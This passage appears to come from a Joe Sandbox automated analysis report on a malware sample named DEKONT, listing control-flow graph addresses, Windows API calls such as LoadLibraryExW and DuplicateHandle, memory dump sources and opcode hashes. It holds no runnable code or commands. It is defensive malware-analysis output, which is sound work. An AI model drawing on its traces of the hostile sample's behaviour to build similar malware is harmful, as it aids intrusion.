                                                              control_flow_graph 1331 6d04da9-6d04e44 DuplicateHandle 1332 6d04e46-6d04e4c 1331->1332 1333 6d04e4d-6d04e6a 1331->1333 1332->1333
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D04D76,?,?,?,?,?), ref: 06D04E37
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 962420cd280d335b244a79a3154e836e09af596ee8fe2af95b3eae572f003894
                                                              • Instruction ID: bee9b146e582c200f48c7f753e6179d0011d1aea9fd73ccfc3f4030307b2fc0a
                                                              • Opcode Fuzzy Hash: 962420cd280d335b244a79a3154e836e09af596ee8fe2af95b3eae572f003894
                                                              • Instruction Fuzzy Hash: D021E3B5D00259EFDB10CFAAD884ADEBBF5FB48310F14841AE918A3350D374A951CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1336 5b28d94 1337 5b28e53-5b28e64 1336->1337 1338 5b28e66 1337->1338 1339 5b28e6b-5b28e74 1337->1339 1338->1339 1341 5b28e7a-5b28e8d 1339->1341 1342 5b28c4b-5b28c70 1339->1342 1345 5b28e94-5b28eaf 1341->1345 1346 5b28e8f 1341->1346 1343 5b28c72 1342->1343 1344 5b28c77-5b28cae 1342->1344 1343->1344 1355 5b28cb0 1344->1355 1356 5b28cb5-5b28ce7 1344->1356 1347 5b28eb1 1345->1347 1348 5b28eb6-5b28eca 1345->1348 1346->1345 1347->1348 1351 5b28ed1-5b28ee7 LdrInitializeThunk 1348->1351 1352 5b28ecc 1348->1352 1354 5b28ee9-5b28fe6 1351->1354 1352->1351 1358 5b28fe8-5b28fed 1354->1358 1359 5b28fee-5b28ff8 1354->1359 1355->1356 1361 5b28d4b-5b28d5e 1356->1361 1362 5b28ce9-5b28d0e 1356->1362 1358->1359 1363 5b28d60 1361->1363 1364 5b28d65-5b28d8a 1361->1364 1366 5b28d10 1362->1366 1367 5b28d15-5b28d43 1362->1367 1363->1364 1370 5b28d99-5b28dd1 1364->1370 1371 5b28d8c-5b28d8d 1364->1371 1366->1367 1367->1361 1372 5b28dd3 1370->1372 1373 5b28dd8-5b28e39 call 5b28790 1370->1373 1371->1341 1372->1373 1379 5b28e40-5b28e52 1373->1379 1380 5b28e3b 1373->1380 1379->1337 1380->1379
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 05B28ED6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8498332cf74ec1b479657725a0e26bfb11508f063534ac7eed6a083668857336
                                                              • Instruction ID: 7173016dd0dc42b5d545444037c52ff9f9dcd36007738264ee4af114c973be7d
                                                              • Opcode Fuzzy Hash: 8498332cf74ec1b479657725a0e26bfb11508f063534ac7eed6a083668857336
                                                              • Instruction Fuzzy Hash: 44112974E042299FDB14DBA8D484EADB7F6FB88304F1481A5F808E7346D771AC42CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1382 6d0d5b8-6d0d600 1384 6d0d602-6d0d605 1382->1384 1385 6d0d608-6d0d637 LoadLibraryExW 1382->1385 1384->1385 1386 6d0d640-6d0d65d 1385->1386 1387 6d0d639-6d0d63f 1385->1387 1387->1386
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06D0D439,00000800,00000000,00000000), ref: 06D0D62A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 36e340253683b06e0ef097b89e9a4ecd92b8ab69b7a82d72b0d3a6087d62cc13
                                                              • Instruction ID: e99fb5b1e01f69af623e898eb14dce17fee8a68453afb63848c61816a218094c
                                                              • Opcode Fuzzy Hash: 36e340253683b06e0ef097b89e9a4ecd92b8ab69b7a82d72b0d3a6087d62cc13
                                                              • Instruction Fuzzy Hash: 5A1112B6C003099FDB14CFAAC884BDEFBF9AF88310F10852AD519A7240C375A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1390 6d0c148-6d0d600 1392 6d0d602-6d0d605 1390->1392 1393 6d0d608-6d0d637 LoadLibraryExW 1390->1393 1392->1393 1394 6d0d640-6d0d65d 1393->1394 1395 6d0d639-6d0d63f 1393->1395 1395->1394
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06D0D439,00000800,00000000,00000000), ref: 06D0D62A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 1b8d6704501bff9308760b91d9d9dde3e67e5d511c346286ce30b158758f7a1b
                                                              • Instruction ID: 01304ae4fa7d3f32752f9d51ef4dd16faad5bd8db4e34595b4f4be1d18d35d42
                                                              • Opcode Fuzzy Hash: 1b8d6704501bff9308760b91d9d9dde3e67e5d511c346286ce30b158758f7a1b
                                                              • Instruction Fuzzy Hash: 2C1103B6D003099FDB10DF9AC844B9EFBF5EB88310F50842AE919A7240C375A545CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06D0D184), ref: 06D0D3BE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: d948330567c5051f59ff2100c5c071fe560712268b5874926d6bb83b3b6f1b9c
                                                              • Instruction ID: 450210dd80782a7b551b19994be16a23dfff10d956b1edfe0618c720f3eb1230
                                                              • Opcode Fuzzy Hash: d948330567c5051f59ff2100c5c071fe560712268b5874926d6bb83b3b6f1b9c
                                                              • Instruction Fuzzy Hash: F4110FB6C003498FDB24DF9AD844BDEFBF5EF88224F14842AD819A7640C379A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -)1#
                                                              • API String ID: 0-1789991113
                                                              • Opcode ID: a7a2af704e817621a6a19bd57f85d89576952907efc0889d9fb8d7b2856cecbb
                                                              • Instruction ID: 487a471772b34ad21eaa4b3d5f8b505ce56e6797f8fe97857a3e2c99361274fc
                                                              • Opcode Fuzzy Hash: a7a2af704e817621a6a19bd57f85d89576952907efc0889d9fb8d7b2856cecbb
                                                              • Instruction Fuzzy Hash: E3216171A0120BCFDB14EBA8D1156DEBBB6AB48704F30442EC816B7B51CB759D44CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31a2f83640ab4dd81cb32341e90fdb371ae0a3f796cc63e900e0e42760963c4b
                                                              • Instruction ID: d6b3e94d1739fa1b6a65908dc413d697ecf5acd0e217364da45fc0867413dfab
                                                              • Opcode Fuzzy Hash: 31a2f83640ab4dd81cb32341e90fdb371ae0a3f796cc63e900e0e42760963c4b
                                                              • Instruction Fuzzy Hash: 92520E74A00219CFEB15DBA5C864B9EBB72FF98700F1081AAC10AAB364DF355D85DF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b2f0a5c0384a4927ae463e3f1681007177e9d71719cefdc1257edcbf474ced5
                                                              • Instruction ID: 071046513c0d588217d9cdcdeb18389597cf6b010fa82f27d049c568d71df8c7
                                                              • Opcode Fuzzy Hash: 7b2f0a5c0384a4927ae463e3f1681007177e9d71719cefdc1257edcbf474ced5
                                                              • Instruction Fuzzy Hash: 32029C35810A6A8FCB014FB8C968299F770FFAF310F25C9E9D8495E206EF715986C754
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 122fd6bc95d3ad04ad169ab5b5168243e4fb837312d4bee8a3c50d2a18ebd5e1
                                                              • Instruction ID: ae4a786778baf49dd3ed393eb1fbd513e10159a811c13b4fbc4df6094ddd9aa7
                                                              • Opcode Fuzzy Hash: 122fd6bc95d3ad04ad169ab5b5168243e4fb837312d4bee8a3c50d2a18ebd5e1
                                                              • Instruction Fuzzy Hash: 27123830A0020A9FDB15CFA9D984A9EFBF6BF88314F248559E8559B365D730ED41CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf1cf2530c61d0f1aff685dc10949b346fb3c42cd99f3991e6665f99b39f0de2
                                                              • Instruction ID: 7698e3711ad5b31242dd65a544ac5050172cf10b88158609a2a90a8ca052c4bb
                                                              • Opcode Fuzzy Hash: bf1cf2530c61d0f1aff685dc10949b346fb3c42cd99f3991e6665f99b39f0de2
                                                              • Instruction Fuzzy Hash: F922D778A0121DCFCB55EF64E898A9DBBB2FF88301F1085A6D909AB358DB305D55CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 596a90780c603d37ff961143b16242f17d473b8963cb35e6b78fdbd663d23f2d
                                                              • Instruction ID: 2474e58d18da5eeab1dbc03051af939bfb9bfdc9de564ded27bf63567b7058ca
                                                              • Opcode Fuzzy Hash: 596a90780c603d37ff961143b16242f17d473b8963cb35e6b78fdbd663d23f2d
                                                              • Instruction Fuzzy Hash: 2222D738A0121DCFCB55EF64E998A9DBBB2FF88301F1085A6D909AB358DB305D55CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0860465b98e4136651739c731eb7218ca0ad04357df8060d3f7957fd9617f8f
                                                              • Instruction ID: 6ac29d159a43c517183bc84b097a76219dbfcc0d14b21014bf227a7927dfd769
                                                              • Opcode Fuzzy Hash: e0860465b98e4136651739c731eb7218ca0ad04357df8060d3f7957fd9617f8f
                                                              • Instruction Fuzzy Hash: FBF12D75A0061ACFCB05CFA9D584AADBBF6FF88314B268059E419EB361CB35EC41CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 13d3734c2237708501516673a5204927a315a29df2e8d9c00096930b9d7a1d06
                                                              • Instruction ID: e6024dc575842dd56267741089b1b2daf1ee38f68394abdbc3845d3273782c25
                                                              • Opcode Fuzzy Hash: 13d3734c2237708501516673a5204927a315a29df2e8d9c00096930b9d7a1d06
                                                              • Instruction Fuzzy Hash: 8CB160707052038FDB1B9E29CA58F3976AAEF85644F24446EE542CF3A1EF29CC42E751
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f026d83683d6986d0804d34d652fe2998ce41c4455386145eccb7fddc574070
                                                              • Instruction ID: f2b95e67b383e2ce341935dc8bb9e6910278b696dd6d91d4db65735e990d69e8
                                                              • Opcode Fuzzy Hash: 3f026d83683d6986d0804d34d652fe2998ce41c4455386145eccb7fddc574070
                                                              • Instruction Fuzzy Hash: 05B1F0307042168FDB268F35E894B2E7BA6AF88354F64896DE446DB390DF74EC41CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6ca59b5b5eb3df66ac72020b12af18cb0686039b28132d5964e3003bbd49983
                                                              • Instruction ID: f7bc3b2223d7a84cb9cbe32b76ac56504b2829f9c01422f1695b7e014156215f
                                                              • Opcode Fuzzy Hash: d6ca59b5b5eb3df66ac72020b12af18cb0686039b28132d5964e3003bbd49983
                                                              • Instruction Fuzzy Hash: 16819F71B001068FDB58DF79C454A6E77BAFF88A00B1585AED406DB3A1DB35EE02CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc8f9f02965bf52761015519e251e281bf92a8557e24f8848acb728db6b6b2c0
                                                              • Instruction ID: b7d08a7c3405d8c466969e6024d8b3521ff3b4d4c94f194874a6f56ede38d1f1
                                                              • Opcode Fuzzy Hash: dc8f9f02965bf52761015519e251e281bf92a8557e24f8848acb728db6b6b2c0
                                                              • Instruction Fuzzy Hash: DE818F74A00206CFCB14DF69E888AAAB7B6FF89204BA4816DD415FB365D731FC41CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b85f01a46419e141ec295c75de6b3195748c0e2bf87be657fb5b0f7dce7913a
                                                              • Instruction ID: 938db7da8c79179c3d27b3579c02b250d644ad27baef54936f97470795bfa925
                                                              • Opcode Fuzzy Hash: 9b85f01a46419e141ec295c75de6b3195748c0e2bf87be657fb5b0f7dce7913a
                                                              • Instruction Fuzzy Hash: A1719271F002199BDB55DFA9D8506AEBBB2AFC8700F148529E406BB380DF34AD05CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64fd9aa629c497df35899833faaabac9a62d201921364a75ce985b11f2370cec
                                                              • Instruction ID: 1f79601aed2a501b6d079f607acc12d49295c4fe9812425f938c94e729e8497c
                                                              • Opcode Fuzzy Hash: 64fd9aa629c497df35899833faaabac9a62d201921364a75ce985b11f2370cec
                                                              • Instruction Fuzzy Hash: 02712B347402468FDB55DF29C898AADBBEAAF49344F2544A9E906CB3B1DB70DC41CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c382e29d2a8ec7497bdda52d516744f2a9dcf1d6f6865bf444dc51896e52242b
                                                              • Instruction ID: 1ea5ff04d4c56697657773fa327048fda8ddecd9f2d5518a1b111d1e9a0df462
                                                              • Opcode Fuzzy Hash: c382e29d2a8ec7497bdda52d516744f2a9dcf1d6f6865bf444dc51896e52242b
                                                              • Instruction Fuzzy Hash: 5B81A274E412298FDB65DF65D894BEDBBB2BF89300F1484EAD849A7250DB305E81CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a823dc7b1b4cdf9ce4c79cf6dbaddebf752c30e5a766b8576e5c3aa2dc5a2670
                                                              • Instruction ID: 0b8680fce5ce3331abfaa7daa0e7ecf431ff94e76ae16097bd98542e9c144203
                                                              • Opcode Fuzzy Hash: a823dc7b1b4cdf9ce4c79cf6dbaddebf752c30e5a766b8576e5c3aa2dc5a2670
                                                              • Instruction Fuzzy Hash: BB51B5788A124F8FD7562B30B5FC5AABBA5FB0F3AB7156D10A10E898169B344064CF12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9a48774f3253a108d34feb32f254a7dc48251e162d745f646684874b79d2d82c
                                                              • Instruction ID: 1a549a958d2e243f2f0d5c829c9d60119d8a6bc92cb4fe8386847cca204dfe5f
                                                              • Opcode Fuzzy Hash: 9a48774f3253a108d34feb32f254a7dc48251e162d745f646684874b79d2d82c
                                                              • Instruction Fuzzy Hash: 7E51A4788A134F8F97163F30B5FC56ABBA5FB0F7AB7556D10A11E8981A9B304064CF12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16f95c2dae0d34f53a70f08a38a4d7d09e3b2619d3fabab481ec8d11ff4852e4
                                                              • Instruction ID: d0c97a89510c835aeeeb42faebf27af82f47063fa9467835aa2a2c36cd4e4879
                                                              • Opcode Fuzzy Hash: 16f95c2dae0d34f53a70f08a38a4d7d09e3b2619d3fabab481ec8d11ff4852e4
                                                              • Instruction Fuzzy Hash: 9E51D474E012099FDB04DFA9D994A9DBBF2FF89301F649129D405BB354DB349C42CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a74acdbaba411f63ca4a5f19c37c7d7a5c324107fbae18e70f0124bd05ae3ded
                                                              • Instruction ID: ab6e94e964f5e12bf603e43c2afd342893c4d2201e2ce69df09f140d6215d783
                                                              • Opcode Fuzzy Hash: a74acdbaba411f63ca4a5f19c37c7d7a5c324107fbae18e70f0124bd05ae3ded
                                                              • Instruction Fuzzy Hash: EC51FD74E01318CFEB15DFA5D898AAEBBB2FF88301F608129D805AB395DB356945DF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a07244976fb73e55a3b92aa8f68bcf2e9426240b10eba378f18716fe62113471
                                                              • Instruction ID: f86c067911041f7943cd71f17f413e9b913c4ed04a348a95e4cef25ce3478f6f
                                                              • Opcode Fuzzy Hash: a07244976fb73e55a3b92aa8f68bcf2e9426240b10eba378f18716fe62113471
                                                              • Instruction Fuzzy Hash: 4751A674E01208DFDB44DFAAD89499DBBF2FF89300F24816AE819AB365DB319801CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64129942a403d720f2e18bdf78e06413b00320eb56481f5ded0b7f773b079846
                                                              • Instruction ID: 7200431ddfc60ce8aaa00eae38f30ed3d8a27303606325338d8ef8747d8ff6d6
                                                              • Opcode Fuzzy Hash: 64129942a403d720f2e18bdf78e06413b00320eb56481f5ded0b7f773b079846
                                                              • Instruction Fuzzy Hash: AE416D3990120ACFD714AFB1E46C7EEBBF5EB4A74AF005829D2017B295CB781A44CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aceef59e02e0e8b0562084aa76366aea00d90384f22ad4b5d69a3096b15e0ec2
                                                              • Instruction ID: 19d25e899a9df998899e73ce7273024141bd0fbd342bbebf767be520a9dea93a
                                                              • Opcode Fuzzy Hash: aceef59e02e0e8b0562084aa76366aea00d90384f22ad4b5d69a3096b15e0ec2
                                                              • Instruction Fuzzy Hash: 67518F74E01209DFCB48DFA9D59499DBBB2FF89301B209569E809AB364DB31AD42CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ce891d2a0c85ad078341d14cae88a178f74c62afe0e795af7be02e181ebebaf
                                                              • Instruction ID: 47d2f369bcfd38108d6a4985cbabfc6063ef866125c51efdbc08d835e3e9104c
                                                              • Opcode Fuzzy Hash: 8ce891d2a0c85ad078341d14cae88a178f74c62afe0e795af7be02e181ebebaf
                                                              • Instruction Fuzzy Hash: AB415A31A0424ADFCF15CFA5C994BEEBBB2EF49354F108159E8159B355D334E950CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04008138ff53b9376b7c4c6108b3580d453b46ec79f0c2d557934ac6dce4915a
                                                              • Instruction ID: 6452429b2c8390a6ccd272c35f1c309861db171a7dc9521f98dea6ef57a8152b
                                                              • Opcode Fuzzy Hash: 04008138ff53b9376b7c4c6108b3580d453b46ec79f0c2d557934ac6dce4915a
                                                              • Instruction Fuzzy Hash: C841C235B002099FDB169F75D8A46AEBBF6BFC9251F24856DD506E7390CE309C02CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3567f8fb4bbb922ac34f1ac54fbdae1d3bd569a98b941dd9e482a62efa3da1e
                                                              • Instruction ID: c99d70cc790dee4792220ec24a503119f07c7509ea3c390f56945d7044b68b3d
                                                              • Opcode Fuzzy Hash: a3567f8fb4bbb922ac34f1ac54fbdae1d3bd569a98b941dd9e482a62efa3da1e
                                                              • Instruction Fuzzy Hash: 96413071E4021ADBDB24DFA5C891ADEBBF5BF88700F248129E415B7350EB70AA45CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea0f8250c6d7b59dc4926cf6371fa9813cfeecf08d24fe7cf1efbf891f2ffb13
